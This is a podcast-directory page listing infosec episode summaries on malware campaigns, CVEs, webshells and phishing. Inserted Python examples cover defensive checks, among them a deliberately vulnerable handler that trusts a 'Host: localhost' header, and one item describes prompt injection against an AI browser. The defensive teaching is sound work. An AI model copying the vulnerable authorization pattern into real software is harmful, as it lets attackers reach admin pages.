Podcasts about infosec

759 podcasts, 14,873 episodes, 30m average duration, 2 new episodes daily, latest episode Nov 14, 2025.

Latest podcast episodes about infosec

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, November 14th, 2025: SmartApeSG and ClickFix; Formbook Obfuscation Tricks; Sudo-rs Vulnerabilities; SANS Holiday Hack Challenge
Nov 14, 2025, 10:09

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
A detailed analysis of a recent SmartApeSG campaign taking advantage of ClickFix. https://isc.sans.edu/diary/32474

Formbook Delivered Through Multiple Scripts
An analysis of a recent version of Formbook showing how it takes advantage of multiple obfuscation tricks. https://isc.sans.edu/diary/32480

sudo-rs vulnerabilities
Two vulnerabilities were patched in sudo-rs, the version of sudo written in Rust, showing that while Rust does have an advantage when it comes to memory safety, there are plenty of other vulnerability classes to worry about. https://ubuntu.com/security/notices/USN-7867-1 https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-c978-wq47-pvvw?ref=itsfoss.com

SANS Holiday Hack Challenge
https://sans.org/HolidayHack

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, November 13th, 2025: OWASP Top 10 Update; Cisco/Citrix Exploits; Test post-quantum readiness
Nov 13, 2025, 6:33

OWASP Top 10 2025 Release Candidate
OWASP published a release candidate for the 2025 version of its Top 10 list. https://owasp.org/Top10/2025/0x00_2025-Introduction/

Citrix/Cisco Exploitation Details
Amazon detailed how Citrix and Cisco vulnerabilities were used by advanced actors to upload webshells. https://aws.amazon.com/blogs/security/amazon-discovers-apt-exploiting-cisco-and-citrix-zero-days/

Testing Quantum Readiness
A website tests your services for post-quantum-resistant cryptographic algorithms. https://qcready.com/

DevSecOps Podcast
#70 - 02 - Bug bounty and its not-so-secret secrets
Nov 13, 2025, 54:53

In this episode we welcome researcher C4ng4c3ir0, a true veteran of the bug bounty world and currently #1 in the Brazilian ranking. He opened up about the daily routine of a vulnerability hunter, the challenges of dealing with slow triage and poorly structured programs, and what separates a good hunter from a mere "report spammer". We discuss the balance between recognition, ethics and technique, and how companies can learn from those who live on the front line of security.
Become a supporter of this podcast: https://www.spreaker.com/podcast/devsecops-podcast--4179006/support
Supported by: Nova8, Snyk, Conviso, Gold Security, Digitalwolk and PurpleBird Security.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, November 12th, 2025: Microsoft Patch Tuesday; Gladinet Triofox Vulnerability; SAP Patches
Nov 12, 2025, 6:03

Microsoft Patch Tuesday for November 2025
https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+for+November+2025/32468/

Gladinet Triofox Vulnerability
Triofox uses the Host header in lieu of proper access control, allowing an attacker to reach the page that manages administrators simply by setting the Host header to localhost. https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480/

SAP November 2025 Patch Day
SAP fixed a critical vulnerability caused by default credentials in its SQL Anywhere Monitor. https://onapsis.com/blog/sap-security-patch-day-november-2025/

Ivanti Endpoint Manager Updates
https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2025-for-EPM-2024?language=en_US
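The Triofox item above describes an authorization check keyed on the client-supplied Host header. The following is an added example, not Triofox's code and not from the Stormcast, that shows such a check beside a hardened one: the Request type, the admin path and the session table are hypothetical stand-ins.

```python
# Added example, not Triofox code: the client-controlled Host header is not an
# authorization signal. Request, ADMIN_PATH and SESSIONS are hypothetical stand-ins.
from dataclasses import dataclass, field

ADMIN_PATH = "/AdminSetup"  # hypothetical path of the administrator management page


@dataclass
class Request:
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


# Hypothetical server-side session store: session id -> role.
SESSIONS = {"sess-admin-1": "admin", "sess-user-1": "user"}


def vulnerable_handler(req: Request) -> int:
    """Gates the admin page on the Host header: anyone who sends
    'Host: localhost' is treated as a local, trusted caller."""
    if req.path != ADMIN_PATH:
        return 200
    host = req.headers.get("Host", "").split(":")[0].lower()
    if host in ("localhost", "127.0.0.1"):
        return 200  # the attacker chose this header value; the check passes
    return 403


def hardened_handler(req: Request) -> int:
    """Gates the admin page on server-side state only: a valid session whose
    role is 'admin'. Nothing the client sends in a header is trusted."""
    if req.path != ADMIN_PATH:
        return 200
    role = SESSIONS.get(req.cookies.get("session", ""))
    return 200 if role == "admin" else 403


def demo() -> tuple:
    """Same forged request against both handlers, plus a real admin session."""
    forged = Request(ADMIN_PATH, headers={"Host": "localhost"})
    admin = Request(ADMIN_PATH, cookies={"session": "sess-admin-1"})
    return vulnerable_handler(forged), hardened_handler(forged), hardened_handler(admin)


if __name__ == "__main__":
    print(demo())  # (200, 403, 200)
```

If an endpoint genuinely must be reachable only from the local machine, decide that from the accepted socket's peer address (and only when no reverse proxy sits in front of the service), never from Host, X-Forwarded-For or any other header the client writes.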

CERIAS Security Seminar Podcast
Abulhair Saparov, Can/Will LLMs Learn to Reason?
Nov 12, 2025, 52:36

Reasoning, the process of drawing conclusions from prior knowledge, is a hallmark of intelligence. Large language models, and more recently large reasoning models, have demonstrated impressive results on many reasoning-intensive benchmarks. Careful studies over the past few years have revealed that LLMs may exhibit some reasoning behavior, and larger models tend to do better on reasoning tasks. However, even the largest current models still struggle on various kinds of reasoning problems. In this talk, we will try to address the question: are the observed reasoning limitations of LLMs fundamental in nature? Or will they be resolved by further increasing the size and data of these models, or by better techniques for training them? I will describe recent work to tackle this question from several different angles. The answer to this question will help us to better understand the risks posed by future LLMs as vast resources continue to be invested in their development.

About the speaker: Abulhair Saparov is an Assistant Professor of Computer Science at Purdue University. His research focuses on applications of statistical machine learning to natural language processing, natural language understanding, and reasoning. His recent work closely examines the reasoning capacity of large language models, identifying fundamental limitations, and developing new methods and tools to address or work around those limitations. He has also explored the use of symbolic and neurosymbolic methods to both understand and improve the reasoning capabilities of AI models. He is also broadly interested in other applications of statistical machine learning, such as to the natural sciences.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, November 11th, 2025: 3CX Related Scans; Watchguard Default Password
Nov 11, 2025, 7:25

It isn't always defaults: Scans for 3CX Usernames
Our honeypots detected scans for usernames that may be related to 3CX business phone systems. https://isc.sans.edu/diary/It%20isn%27t%20always%20defaults%3A%20Scans%20for%203CX%20usernames/32464

Watchguard Default Password Controversy
A CVE number was assigned to a default password commonly used in Watchguard products. This was a documented username and password that was recently removed in a firmware upgrade. https://github.com/cyberbyte000/CVE-2025-59396/blob/main/CVE-2025-59396.txt https://nvd.nist.gov/vuln/detail/CVE-2025-59396

JavaScript expr-eval Vulnerability
The JavaScript expr-eval library was vulnerable to a code execution issue. https://www.kb.cert.org/vuls/id/263614

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, November 10th, 2025: Code Repo Requests; Time Delayed ICS Attacks; Encrypted LLM Traffic Sidechannel Attacks
Nov 10, 2025, 7:06

Honeypot Requests for Code Repositories
Attackers continue to scan websites for source code repositories. Keep your repositories outside your document root and proactively scan your own sites. https://isc.sans.edu/diary/Honeypot%3A%20Requests%20for%20%28Code%29%20Repositories/32460

Malicious NuGet Packages Deliver Time-Delayed Destructive Payloads
Newly discovered malicious .NET packages attempt to deliver a time-delayed attack targeting ICS systems. https://socket.dev/blog/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads

Side Channel Leaks in Encrypted Traffic to LLMs
Traffic to LLMs can be profiled to discover the nature of prompts sent by a user based on the amount and structure of the encrypted data. https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/
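The repository-scanning item above recommends watching for such requests and probing your own sites. The following is an added example, not ISC's code: it flags version-control probes in Combined Log Format access logs (including percent-encoded variants) and lists the same paths to request against your own site, where any 2xx answer is a finding. The log lines are constructed, with addresses from documentation ranges.

```python
# Added example, not ISC's code: flag probes for exposed version-control
# metadata in Combined Log Format access logs, and list the same paths to
# check on your own sites. SAMPLE_LOG is constructed; the IPs are documentation ranges.
import re
from urllib.parse import unquote, urlsplit

# VCS metadata that must never be reachable below the document root.
REPO_PROBE_PATHS = (
    "/.git/HEAD", "/.git/config", "/.git/index",
    "/.svn/entries", "/.svn/wc.db",
    "/.hg/requires", "/.bzr/branch-format",
)

# ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VCS_DIR_RE = re.compile(r"/\.(git|svn|hg|bzr)(/|$)", re.IGNORECASE)


def is_repo_probe(target: str) -> bool:
    """True if the request target reaches into a VCS directory, after
    splitting off the query string and undoing percent-encoding."""
    path = unquote(urlsplit(target).path)
    return VCS_DIR_RE.search(path) is not None


def find_repo_probes(log_text: str) -> list:
    """One record per repository probe; 'served' marks a 2xx answer,
    i.e. the server actually handed out repository content."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_repo_probe(m["target"]):
            continue
        status = int(m["status"])
        hits.append({"ip": m["ip"], "target": m["target"],
                     "status": status, "served": 200 <= status < 300})
    return hits


def self_check_urls(base_url: str) -> list:
    """URLs to request against your own site; any 2xx answer is a finding."""
    return [base_url.rstrip("/") + p for p in REPO_PROBE_PATHS]


# Constructed sample: two scanners, one of them percent-encoding the slash.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2025:08:01:12 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2025:08:01:13 +0000] "GET /.git/config HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2025:08:02:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/8.4.0"
198.51.100.7 - - [10/Nov/2025:08:02:41 +0000] "GET /.svn/entries?x=1 HTTP/1.1" 404 196 "-" "curl/8.4.0"
192.0.2.9 - - [10/Nov/2025:08:03:00 +0000] "GET /app/.git%2FHEAD HTTP/1.1" 403 0 "-" "python-requests/2.32"
"""

if __name__ == "__main__":
    for hit in find_repo_probes(SAMPLE_LOG):
        print(hit)
```

The second sample line is the one that matters operationally: a 200 for `.git/config` means the repository was actually served, not merely requested, and the fix is to move the checkout outside the document root (or deny dot-directories at the web server) rather than to block the scanning address.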

Digitalia
Digitalia #798 - Elon Marx
Nov 10, 2025, 101:56, transcription available

The anniversary of the Morris worm. AI banned in Asahi Linux development. Liber Liber, online scams, and PayPal chargebacks. A Waymo ran over a cat. School without smartphones. These and many other tech news items are discussed in this week's episode.
From the distributed Digitalia studio: Franco Solerio, Michele Di Maio, Francesco Facconi
Executive producers: Arnoud Van Der Giessen, Matteo Cosentino, Fiorenzo Pilla, Alessio Pascucci, @Blis, Alessandro Lazzarini, Anonymous Podcast Guru User, Marco Goglio, Matteo De Lucia, Davide D'angelo, Roberto Barison, Danilo Sia, Arzigogolo, Massimiliano Casamento, Massimiliano Saggia, Matteo Masconale, Massimo Passerini, Francesco Paolo Sileno, Paolo Lucciola, Maurizio Verrone, Alessio Conforto, Paolo Bernardini, Stefano Orso, Pasquale Maffei, Matteo Arrighi, Davide Tinti, Consultech Srl, ma7u, Maurizio Galluzzo, Davide Capra, Michele Olivieri, Simone Pignatti, Giuliano Arcinotti, Massimo Dalla Motta, Ivan, Nicola Pedonese, Giulio Gabrieli, @Joanpiretz, Simone Andreozzi, Piero Alberto Mazzo, Manuel Zavatta, Matteo Carpentieri, Federico Bruno, @Michele_Da_Milano, Davide Dari, Andrea Sinigaglia, Edoardo Zini, Yoandi Herrera, Pierpaolo Taffarello, @Akagrinta, Christian Fabiani, Andrea Dell'agostino, @Jh4CkalSponsor
Links:
  • Synthient Credential Stuffing Threat Data Breach
  • 37 years ago this week, the Morris worm
  • Generative AI Policy - Asahi Linux Documentation
  • Apple Podcasts Embraces Chapters
  • The paradoxical case of Liber Liber and PayPal
  • What is the chargeback fee?
  • Apple will power Siri with Google's Gemini AI
  • Death of beloved neighborhood cat sparks outrage against robotaxis
  • Hackers are already using AI-enabled malware, Google says
  • The Chinese bus in the limestone quarry
  • Tesla Shareholders Approve Elon Musk's $1 Trillion Pay Package
  • Elon Musk says Optimus will 'eliminate poverty'
  • Karp: "a Surveillance State Is Preferable to China Winning"
  • Meta projected 10% of 2024 revenue came from scams
  • Ashamed if OpenAI isn't first company led by an AI CEO
  • Meet Project Suncatcher, Google's plan to put AI data centers in space
  • Lega Serie A will also seek compensation
  • su(0)ny - Home
  • US gives local police a face-scanning app
  • New York school phone ban has made lunch loud again
  • School in the age of the electronic register
Gadgets of the day:
  • ARC Raiders - Extraction game based in Napoli
  • The Art of Atari
  • Portale antenati - a digital archive of historical civil records
Support Digitalia, become an executive producer.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, November 7th, 2025: PowerShell Log Correlation; RondoDox Dissected; Google Chrome and Cisco Patches
Nov 7, 2025, 5:31

Binary Breadcrumbs: Correlating Malware Samples with Honeypot Logs Using PowerShell [Guest Diary]
Windows, with PowerShell, has a great scripting platform to match common Linux/Unix command line utilities. https://isc.sans.edu/diary/Binary%20Breadcrumbs%3A%20Correlating%20Malware%20Samples%20with%20Honeypot%20Logs%20Using%20PowerShell%20%5BGuest%20Diary%5D/32454

RondoDox v2 Increases Exploits
RondoDox (or RondoWorm) added a substantial number of new exploits to its repertoire. https://beelzebub.ai/blog/rondo-dox-v2/

Google Chrome Updates
Google released an update for Google Chrome addressing five vulnerabilities. https://chromereleases.googleblog.com/2025/11/stable-channel-update-for-desktop.html

Cisco Unified Contact Center Express Remote Code Execution Vulnerabilities
Cisco patched two critical vulnerabilities in its Contact Center Express software. These vulnerabilities may lead to a full system compromise. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cc-unauth-rce-QeN8h7mQ

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, November 6th, 2025: Domain API Update; Teams Spoofing; VShell Report
Nov 6, 2025, 5:43

Updates to Domainname API
Some updates to our domainname API will make it more flexible and make it easier and faster to get the complete dataset. https://isc.sans.edu/diary/Updates%20to%20Domainname%20API/32452

Microsoft Teams Impersonation and Spoofing Vulnerabilities
Checkpoint released details about recently patched spoofing and impersonation vulnerabilities in Microsoft Teams. https://research.checkpoint.com/2025/microsoft-teams-impersonation-and-spoofing-vulnerabilities-exposed/

NViso Report: VSHELL
NViso published an amazingly detailed report describing the remote control implant VSHELL. The report includes details about the inner workings of the tool as well as detection ideas. https://www.nviso.eu/blog/nviso-analyzes-vshell-post-exploitation-tool

DevSecOps Podcast
#07 - 01 - AppSec and AI - Will it click?
Nov 6, 2025, 49:52

The launch of Aardvark marked another step in the integration of Application Security and Artificial Intelligence. But what does this really mean for the future of software security? In this episode we explore how AI-based solutions are transforming the way we detect, prioritize and fix vulnerabilities, and what changes in the AppSec professional's role in the face of this growing automation. We talk about the risks, opportunities and ethical limits of this evolution: from automated triage to secure code generation, including frameworks that promise "autonomous security". In the end, the question remains: are we ready to entrust the defense of our applications to AI?
Become a supporter of this podcast: https://www.spreaker.com/podcast/devsecops-podcast--4179006/support
Supported by: Nova8, Snyk, Conviso, Gold Security, Digitalwolk and PurpleBird Security.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, November 5th, 2025: Apple Patches; Exploits against Trucking and Logistics; Google Android Patches
Nov 5, 2025, 6:29

Apple Patches Everything, Again
Apple released a minor OS upgrade across its lineup, fixing a number of security vulnerabilities. https://isc.sans.edu/diary/Apple%20Patches%20Everything%2C%20Again/32448

Remote Access Tools Used to Compromise Trucking and Logistics
Attackers infect trucking and logistics companies with ordinary remote management tools, then use that access to inject malware into other companies or to learn about high-value loads in order to steal them. https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics

Google Android Patch Day
Google released its usual monthly Android updates this week. https://source.android.com/docs/security/bulletin/2025-11-01

CERIAS Security Seminar Podcast
Hanshen Xiao, When is Automatic Privacy Proof Possible for Black-Box Processing?
Nov 5, 2025, 58:19

Can we automatically and provably quantify and control the information leakage from a black-box processing? From a statistical inference standpoint, in this talk, I will start from a unified framework to summarize existing privacy definitions based on input-independent indistinguishability and unravel the fundamental challenges in crafting privacy proofs for general data processing. Yet the landscape shifts when we gain access to the (still possibly black-box) secret generation. By carefully leveraging its entropy, we unlock the black-box analysis. This breakthrough enables us to automatically "learn" the underlying inference hardness for an adversary to recover arbitrarily-selected sensitive features fully through end-to-end simulations without any algorithmic restrictions. Meanwhile, a set of new information-theoretical tools will be introduced to efficiently minimize additional noise perturbation, assisted with sharpened adversarially adaptive composition. I will also unveil the win-win situation between privacy and stability for simultaneous algorithm improvements. Concrete applications will be given in diverse domains, including privacy-preserving machine learning on image classification and large language models, side-channel leakage mitigation and formalizing long-standing heuristic data obfuscations.

About the speaker: Hanshen Xiao is an Assistant Professor in the Department of Computer Science. He received his Ph.D. degree in computer science from MIT and B.S. degree in Mathematics from Tsinghua University. Before joining Purdue, he was a research scientist at NVIDIA Research. His research focuses on provable trustworthy machine learning and computation, with a particular focus on automated black-box privatization, differential trust with applications on backdoor defense and memorization mitigation, and trustworthiness evaluation.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, November 4th, 2025: XWiki SolrSearch Exploits and Rapper Feud; AMD Zen 5 RDSEED Bug; More Malicious Open VSX Extensions
Nov 4, 2025, 6:56

XWiki SolrSearch Exploit Attempts CVE-2025-24893
We have detected a number of exploit attempts against XWiki taking advantage of a vulnerability that was added to the KEV list on Friday. https://isc.sans.edu/diary/XWiki%20SolrSearch%20Exploit%20Attempts%20%28CVE-2025-24893%29%20with%20link%20to%20Chicago%20Gangs%20Rappers/32444

AMD Zen 5 Random Number Generator Bug
The RDSEED instruction on AMD's Zen 5 processors returns 0 more often than it should. https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7055.html

SleepyDuck malware invades Cursor through Open VSX
Yet another Open VSX extension stealing crypto credentials. https://secureannex.com/blog/sleepyduck-malware/
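The RDSEED item above is a case where a hardware generator misbehaves in one specific, measurable way: it returns zero too often. The following is an added example, not from AMD or the Stormcast, of the sanity check a practitioner would run over a captured output stream: count exact zeros and compare against the binomial expectation for a uniform source of the sampled width. The samples come from a seeded software PRNG standing in for RDSEED (constructed data), so what is exercised is the statistic, not any CPU; on real hardware, feed it the values the instruction actually returned with CF set.

```python
# Added example, not from AMD or the Stormcast: a zero-frequency sanity check
# for a hardware RNG output stream. Samples here come from a seeded software
# PRNG standing in for RDSEED (constructed data), so only the statistic is tested.
import math
import random


def excess_zero_check(samples, width_bits: int, z_threshold: float = 6.0) -> dict:
    """Count exact-zero outputs and compare with the binomial expectation
    for a uniform width_bits-wide source. A z-score above z_threshold means
    zero shows up far more often than a correct generator would produce."""
    n = len(samples)
    zeros = sum(1 for s in samples if s == 0)
    p0 = 2.0 ** -width_bits            # P(output == 0) for a uniform source
    expected = n * p0
    sigma = math.sqrt(n * p0 * (1.0 - p0))
    z = (zeros - expected) / sigma if sigma > 0 else float("inf")
    return {"n": n, "zeros": zeros, "expected": expected,
            "z": z, "suspicious": z > z_threshold}


def simulate_samples(n: int, width_bits: int, zero_every: int = 0, seed: int = 1) -> list:
    """Constructed stand-in for an RDSEED stream. zero_every > 0 injects a
    spurious 0 every zero_every samples to mimic a faulty generator."""
    rng = random.Random(seed)
    out = [rng.getrandbits(width_bits) for _ in range(n)]
    if zero_every:
        for i in range(0, n, zero_every):
            out[i] = 0
    return out


if __name__ == "__main__":
    # A healthy 16-bit stream: ~3 zeros expected in 200k samples.
    print(excess_zero_check(simulate_samples(200_000, 16), 16))
    # A faulty stream returning 0 once per thousand calls: flagged immediately.
    print(excess_zero_check(simulate_samples(200_000, 16, zero_every=1000), 16))
```

RDSEED comes in 16-, 32- and 64-bit forms, and width_bits must match the form that was sampled: for the 64-bit form the expected zero count is so small that a single zero in a modest sample is already worth investigating, which is why the check keys on the exact zero value rather than on general randomness statistics.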

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, November 3rd, 2025: Port 8530/8531 Scans; BADCANDY Webshells; Open VSX Security Improvements
Nov 3, 2025, 6:26

Scans for WSUS: Port 8530/8531 TCP, CVE-2025-59287
We observed an increase in scans for TCP ports 8530 and 8531. These ports are associated with WSUS, and the scans are likely looking for servers vulnerable to CVE-2025-59287. https://isc.sans.edu/diary/Scans%20for%20Port%208530%208531%20%28TCP%29.%20Likely%20related%20to%20WSUS%20Vulnerability%20CVE-2025-59287/32440

BADCANDY Webshell Implant Deployed via
The Australian Signals Directorate warns that they still see Cisco IOS XE devices not patched for CVE-2023-20198. A threat actor is now using this vulnerability to deploy the BADCANDY implant for persistent access. https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/badcandy

Improvements to Open VSX Security
In reference to the Glassworm incident, Open VSX published a blog post outlining some of the security improvements they will make to prevent a repeat of this incident. https://blogs.eclipse.org/post/mikaël-barbero/open-vsx-security-update-october-2025

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, October 31st, 2025: Bug Bounty Headers; Exchange hardening; MOVEit vulnerability
Oct 31, 2025, 6:19

X-Request-Purpose: Identifying "research" and bug bounty related scans?
Our honeypots captured a few requests with bug-bounty-specific headers. These headers are meant to make it easier to identify requests related to bug bounty programs, and they are supposed to identify the researcher conducting the scans. https://isc.sans.edu/diary/X-Request-Purpose%3A%20Identifying%20%22research%22%20and%20bug%20bounty%20related%20scans%3F/32436

Proton Breach Observatory
Proton opened its breach observatory. This website collects information about breaches affecting companies that have not yet made the breach public. https://proton.me/blog/introducing-breach-observatory

Microsoft Exchange Server Security Best Practices
A new document published by a collaboration of national cyber security agencies summarizes the steps that should be taken to harden Exchange Server. https://www.nsa.gov/Portals/75/documents/resources/cybersecurity-professionals/CSI_Microsoft_Exchange_Server_Security_Best_Practices.pdf?ver=9mpKKyUrwfpb9b9r4drVMg%3d%3d

MOVEit Vulnerability
Progress published an advisory for its file transfer program MOVEit. This software has had heavily exploited vulnerabilities in the past. https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Thursday, October 30th, 2025: Memory Only Filesystems Forensics; Azure Outage; docker-compose patch
Oct 30, 2025, 6:07

How to Collect Memory-Only Filesystems on Linux Systems
Getting forensically sound copies of memory-only file systems on Linux can be tricky, as tools like dd do not work. https://isc.sans.edu/diary/How%20to%20collect%20memory-only%20filesystems%20on%20Linux%20systems/32432

Microsoft Azure Front Door Outage
Today, Microsoft's Azure Front Door service failed, leaving users unable to authenticate to various Azure-related services. https://azure.status.microsoft/en-us/status

Docker-Compose Vulnerability
A vulnerability in docker-compose may be used to trick users into creating files outside the docker-compose directory. https://github.com/docker/compose/security/advisories/GHSA-gv8h-7v7w-r22q

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Wednesday, October 29th, 2025: Invisible Subject Character Phishing; Tomcat PUT Vuln; BIND9 Spoofing Vuln PoC
Oct 29, 2025, 8:04

Phishing with Invisible Characters in the Subject Line
Phishing emails use invisible UTF-8 encoded characters to break up keywords used to detect phishing (or spam). This is aided by mail clients not rendering some characters that should be rendered. https://isc.sans.edu/diary/A%20phishing%20with%20invisible%20characters%20in%20the%20subject%20line/32428

Apache Tomcat PUT Directory Traversal
Apache released an update to Tomcat fixing a directory traversal vulnerability in how the PUT method is used. Exploits could upload arbitrary files, leading to remote code execution. https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog

BIND9 DNS Spoofing Vulnerability
A PoC exploit is now available for the recently patched BIND9 spoofing vulnerability. https://gist.github.com/N3mes1s/f76b4a606308937b0806a5256bc1f918
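The subject-line item above describes keyword splitting with characters the client never draws. The following is an added example, not the ISC diary's code, of the normalization step a mail filter needs before keyword matching: NFKC-fold the subject (so fullwidth and other compatibility forms collapse to ASCII), then drop format and control code points plus a short list of other invisibles, and treat the number of removed characters as a signal in its own right. The subject string is constructed.

```python
# Added example, not the ISC diary's code: strip the invisible code points that
# phishing subjects use to split keywords, then match keywords on the cleaned
# text. SUBJECT below is constructed.
import unicodedata

# Invisible or near-invisible characters outside Unicode's Cf/Cc categories
# that still render as nothing in many clients (combining grapheme joiner,
# Hangul fillers).
EXTRA_INVISIBLE = {"\u034f", "\u115f", "\u1160", "\u3164", "\uffa0"}


def normalize_subject(subject: str) -> tuple:
    """Return (cleaned, removed): NFKC-fold the text, then drop every format
    (Cf) and control (Cc) code point except ordinary whitespace, plus
    EXTRA_INVISIBLE. 'removed' counts how many characters were dropped."""
    folded = unicodedata.normalize("NFKC", subject)
    kept, removed = [], 0
    for ch in folded:
        cat = unicodedata.category(ch)
        if ch in EXTRA_INVISIBLE or (cat in ("Cf", "Cc") and not ch.isspace()):
            removed += 1
            continue
        kept.append(ch)
    return "".join(kept), removed


def flag_subject(subject: str, keywords) -> dict:
    """Keyword match on the normalized subject. A non-zero 'removed' count is
    itself suspicious: legitimate subjects rarely contain such characters."""
    cleaned, removed = normalize_subject(subject)
    low = cleaned.lower()
    hits = sorted(k for k in keywords if k.lower() in low)
    return {"cleaned": cleaned, "removed": removed, "matches": hits,
            "suspicious": bool(hits) or removed > 0}


KEYWORDS = ("password", "urgent", "invoice", "verify")
# Constructed subject: zero-width space U+200B inside "urgent" and "password",
# soft hyphen U+00AD inside "expires". Plain substring matching misses all three.
SUBJECT = "Ur\u200bgent: your pass\u200bword ex\u00adpires today"

if __name__ == "__main__":
    print(flag_subject(SUBJECT, KEYWORDS))
```

Run the normalization on the raw decoded header value, before any display-oriented processing, since the whole point of the trick is that the rendered subject looks clean.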

Relating to DevSecOps
Episode #081: Burnout by Budget Season: Surviving Q4 in Security
Oct 29, 2025, 21:57

In this candid and cathartic episode, Ken and Mike unpack the chaos that is Q4 for security professionals. From budget burnouts to end-of-year pentesting sprints, they explore why the final months of the year feel like a perfect storm for stress. Tune in as they share hard-earned lessons, practical advice for maintaining your sanity, and some gentle reminders that not everything needs to ship before Christmas. Whether you're a tired vendor, an overwhelmed engineer, or just trying to make it to PTO, this episode is for you.

Accenture InfoSec Beat
InfoSec Beat: Careers in Information Security – Strategy and Emerging Programs
Oct 29, 2025, 20:18

This episode of the InfoSec Beat podcast focuses on careers in information security. Accenture CISO Kris Burkhardt talks with Renée Fletcher, a program manager in Accenture Information Security. Renée is at a turning point in her career, moving from Governance, Risk and Compliance to a new strategic programs role as the Cyberstrategy, Geopolitical and Regulatory lead. Having been on the frontlines of strengthening Accenture's regulatory readiness, she reflects on starting from what you know to assess risk, building cross-functional teams, and communicating effectively. Learn why her career is a lesson in what can happen when the detour becomes the destination, and how her degree in forensic science still helps her today. Renée's career advice? You're more capable than you think.

CERIAS Security Seminar Podcast
Marcus Botacin, Malware Detection under Concept Drift: Science and Engineering
Oct 29, 2025, 52:13

The current largest challenge in ML-based malware detection is maintaining high detection rates while samples evolve, causing classifiers to drift. What is the best way to solve this problem? In this talk, Dr. Botacin presents two views on the problem: the scientific and the engineering. In the first part of the talk, Dr. Botacin discusses how to make ML-based drift detectors explainable. The talk discusses how one can split the classifier knowledge into two: (1) the knowledge about the frontier between Malware (M) and Goodware (G); and (2) the knowledge about the concept of the (M and G) classes, to understand whether the concept or the classification frontier changed. The second part of the talk discusses how the experimental conditions in which the drift handling approaches are developed often mismatch the real deployment settings, causing the solutions to fail to achieve the desired results. Dr. Botacin points out ideal assumptions that do not hold in reality, such as: (1) the amount of drifted data a system can handle, and (2) the immediate availability of oracle data for drift detection, when in practice a scenario of label delays is much more frequent. The talk demonstrates a solution for these problems via a 5K+ experiment, which illustrates (1) how to explain every drift point in a malware detection pipeline and (2) how an explainable drift detector also makes online retraining achieve higher detection rates while requiring fewer retraining points than traditional approaches.

About the speaker: Dr. Botacin is a Computer Science Assistant Professor at Texas A&M University (TAMU, USA) since 2022. Ph.D. in Computer Science (UFPR, Brazil), Master's in Computer Science and Computer Engineering (UNICAMP, Brazil). Malware Analyst since 2012. Specialist in AV engines and Sandbox Development. Dr. Botacin published research papers at major academic conferences and journals. Dr. Botacin also presented his work at major industry and hacking conferences, such as HackInTheBox and Hou.Sec.Con. Page: https://marcusbotacin.github.io/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, October 28th, 2025: Bytes over DNS; Unifi Access Vuln; OpenAI Atlas Prompt Injection
Oct 28, 2025, 6:17

Bytes over DNS
Didier investigated which bytes may be transmitted as part of a hostname in DNS packets, depending on the client resolver and recursive resolver constraints. https://isc.sans.edu/diary/Bytes%20over%20DNS/32420

Unifi Access Vulnerability
Unifi fixed a critical vulnerability in its Access product. https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191

OpenAI Atlas Omnibox Prompt Injection
OpenAI's latest browser can be jailbroken by inserting prompts in URLs. https://neuraltrust.ai/blog/openai-atlas-omnibox-prompt-injection

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, October 27th, 2025: Bilingual Phishing; Kaitai Struct WebIDE
Oct 27, 2025, 6:20

Bilingual Phishing for Cloud Credentials
Guy observed identical phishing messages in French and English attempting to phish cloud credentials. https://isc.sans.edu/diary/Phishing%20Cloud%20Account%20for%20Information/32416

Kaitai Struct WebIDE
